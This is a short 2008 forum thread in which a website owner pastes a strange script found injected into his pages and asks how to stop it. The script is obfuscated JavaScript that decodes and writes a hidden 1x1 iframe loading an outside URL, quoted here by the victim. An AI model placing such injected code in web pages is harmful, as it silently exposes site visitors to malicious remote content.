Page 1 of 1

A strange code

Posted: Wed Nov 12, 2008 12:51 am
by jeeten
We had just launched the website. And after few days, I got some strange code at the end of my pages . The script is like this

Code: Select all

<html> <body><script>var source ="=jgsbnf!tsd>#iuuq;00usbggpl/do0pvu/qiq#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = ""; 
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); 
document.write(result); </script>
</html> </body>

This script is causing problem to load the page. Plz can anyone help to stop this unwanted script??????

Re: A strange code

Posted: Wed Nov 12, 2008 10:54 am
by atm
Looks like this post says you have some bad karma going on there...

http://snewscms.com/forum/index.php?topic=7918.msg56533

Re: A strange code

Posted: Mon Nov 17, 2008 11:51 pm
by jeeten
No idea yet. I had seen that too but can someone tell me how to prevent such codes???